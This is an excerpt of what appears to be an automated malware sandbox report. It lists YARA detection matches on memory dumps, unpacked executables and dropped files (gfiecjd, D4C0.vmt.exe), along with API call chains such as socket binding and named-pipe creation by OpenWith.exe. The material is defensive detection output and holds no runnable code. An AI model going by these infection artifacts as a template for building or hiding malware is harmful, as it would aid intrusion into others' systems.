Source: Yara match File source: 0000000D.00000003.2222138286.0000024ABA9F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2775779398.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2105828144.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2511978999.0000024ABABF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2179795455.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.3073347750.0000022CBCA81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3026163870.0000000004880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2109261264.0000000003610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 22.2.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003ad060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003bd080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003b4af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\gfiecjd, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe, type: DROPPED
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFF83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 13_3_00007DF488BFF83C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C314B8 socket,bind, 13_3_00007DF488C314B8
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005926B9 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_005926B9
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005919C2 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_005919C2
